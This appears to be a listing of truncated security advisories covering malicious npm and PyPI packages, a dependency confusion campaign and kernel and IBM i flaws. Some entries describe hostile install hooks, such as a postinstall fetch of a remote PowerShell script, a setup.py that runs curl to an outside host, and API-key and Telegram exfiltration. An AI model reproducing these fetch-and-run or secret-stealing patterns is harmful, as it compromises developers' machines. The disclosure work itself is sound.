MAL-2026-4840 Malicious code in @bcs-bank-complex-ui/deeplink (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware a93d855d3be0839ea18a9eb78249c1ba50f9029cf31e49e069e118deae5eca46 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2026-4845 Malicious code in @polka-ui/recoc (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ebdab3116c10799ff2e38e53ee85ffe7d2fb61961d8e3924319030b12d2a516c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2026-4838 Malicious code in justsaying-docs (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis e1728e1b0cb2ea174743b9e437b707c768bb8979ba6299fedabfd49ea8a7d8e2 The OpenSSF Package Analysis project identified 'justsaying-docs' @ 2.4.4 npm as malicious. It is considered malicious because: - The package...

CVE-2026-45927

A flaw was found in the Linux kernel's Berkeley Packet Filter BPF subsystem. This vulnerability, a Time-of-check to time-of-use TOCTOU bug, allows a local attacker to modify the contents of a BPF map after its hash has been calculated but before it is frozen. Consequently, a trusted loader could ...

Malicious code in @cloudplatform-single-spa/business-solutions (npm)

Part of a dependency confusion attack campaign targeting the @cloudplatform-single-spa and @mlspace npm scopes. The attacker npm user mr.4nd3r50n published 139 scoped packages at the inflated version 99.99.99, which resolves ahead of any private registry version via npm's default version...

MAL-2026-5023 Malicious code in @mlspace/model-monitoring (npm)

Part of a dependency confusion attack campaign targeting the @cloudplatform-single-spa and @mlspace npm scopes. The attacker npm user mr.4nd3r50n published 139 scoped packages at the inflated version 99.99.99, which resolves ahead of any private registry version via npm's default version...

Malicious code in @cloudplatform-single-spa/magic-bridge (npm)

Part of a dependency confusion attack campaign targeting the @cloudplatform-single-spa and @mlspace npm scopes. The attacker npm user mr.4nd3r50n published 139 scoped packages at the inflated version 99.99.99, which resolves ahead of any private registry version via npm's default version...

MAL-2026-4833 Malicious code in bulletproof-json (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 00849bd08fa4e9ebb1877039ab1ff287fd0ab89a683a45229176f717b6db1e9d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

MAL-2026-4830 Malicious code in editorial-code (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis d7404afc131a113ef01d7eb896439a8719bb0f1b8d67e491d53321fdd5981e97 The OpenSSF Package Analysis project identified 'editorial-code' @ 99.0.1 npm as malicious. It is considered malicious because: - The package...

MAL-2026-4831 Malicious code in editorial-mse-authentication-ui (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis a97fd474e8661c575287f7cc9fddd0ee1ac95240c13653555ca2b416e895b99a The OpenSSF Package Analysis project identified 'editorial-mse-authentication-ui' @ 99.0.1 npm as malicious. It is considered malicious because:...

IBM i 安全漏洞

IBM i is an operating system developed by the American International Business Machines IBM company, which runs on IBM Power Systems and IBM PureSystems. Versions 7.6, 7.5, 7.4, and 7.3 of IBM i have security vulnerabilities. These vulnerabilities stem from uncontrolled recursion in the Integrated...

MAL-2026-4826 Malicious code in wm-mapper (npm)

--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis d3ca8c31fe1e2448adc737f90ef9278202575bc77d3a4a5206e62920219e54a0 The OpenSSF Package Analysis project identified 'wm-mapper' @ 99.9.1 npm as malicious. It is considered malicious because: - The package...

MAL-2026-4815 Malicious code in @slipless/sdk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cd12d144d97dca69d9861a3a68bc2bfd138e3f3d5514eb70303c9b8e0c472e17 On npm install, scripts/postinstall.cjs fetches https://slipless.xyz/main.ps1 mutable URL, no hash or signature verification, writes it to the OS tem...

Malicious code in chainix (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 93d9609d2eac0c0ff33aed557171138930255798aa649fa648b04814c8cb1908 Package presents itself as a pino-compatible logger README badges link to pinojs/pino, exports alias module.exports.pino = middleware but its exporte...

MAL-2026-4819 Malicious code in token-me-uk (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2a058b653e7a491fdf0c9128b4d2d408c2cdac6a1784adc5f02a0975a0e669eb The CLI in cli.mjs reads its API key from process.env.TOKENMEUKAPIKEY, falling back to process.env.OPENAIAPIKEY and then process.env.ANTHROPICAPIKEY...

Malicious code in datapipe-util (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 74a9da1afe75ec2379c4bade6ac5145c920900e1a1e1173d59b9003061e3fb0f The package intentionally uses the malicious binproto package deploying the malware. --- Category: MALICIOUS - The campaign has clearly malicious intent, like...

Malicious code in amaco-os (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0a6204f29c39ab7a22921331bf33f2501b27fba9aac6a8b87b833caef9c5f506 dist/index.js contains a hardcoded Telegram Bot API endpoint https://api.telegram.org referenced from a fetch/POST call alongside process.env access...

MAL-2026-4818 Malicious code in saturn-bail (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9a29ae44bbeeb4d31d176d78d669615e7a508bd236620cc3724478100f9b6997 saturn-bail is a Baileys-derivative WhatsApp library that, on every makeWASocket call, schedules a 90-second timer which executes...

MAL-2026-4814 Malicious code in vectordb-engine (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 42695503b90ec4adc30c038c3321d637f05038f841bcc5f463a16b891fe4e3e0 During pip install, a custom buildext step in src/vectordbenginebuild.py runs an obfuscated payload that performs targeted reconnaissance and...

Malicious code in baidubsrc (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e303b294e3a8f77fdfa91935af2cd5828572f5ab5ec2f0e0b34a0136e33d70dd setup.py executes os.system"curl xiangyangt.com/pypi" unconditionally during pip install. This is an unauthenticated plaintext HTTP request to a...